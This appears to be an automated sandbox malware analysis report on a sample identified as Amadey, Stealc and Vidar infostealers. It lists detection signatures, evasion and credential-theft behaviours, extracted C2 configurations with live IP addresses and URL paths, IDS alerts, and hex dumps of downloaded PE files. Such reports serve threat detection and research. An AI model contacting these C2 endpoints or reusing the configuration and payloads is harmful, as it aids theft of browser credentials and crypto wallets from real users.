Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1570734
MD5: ba177a2ef8336daa29fcb4302054eb37
SHA1: 944701f5db900b06c1df014df31b0beba772468b
SHA256: 3e0ac437238d31e092b17484d03555f2501f761e4d1fdee138f848e3c41e3aa9
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.php2D Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpE8 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpfi Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllQ Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php/b Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllK Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllX Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpzD Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpBLIC=C: Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000011.00000002.3364528536.0000000000E51000.00000040.00000001.01000000.0000000E.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.4340.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C976C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C976C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CACA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6CACA9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAC44C0 PK11_PubEncrypt, 0_2_6CAC44C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA94420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6CA94420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAC4440 PK11_PrivDecrypt, 0_2_6CAC4440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6CB125B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6CAAE6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA8670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6CAA8670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CACA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6CACA650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6CAEA730
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49951 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2706321134.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2706321134.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49707 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49707 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49707
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49707 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49707
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49707 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50001 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50009
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 21:40:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 21:40:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 21:40:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
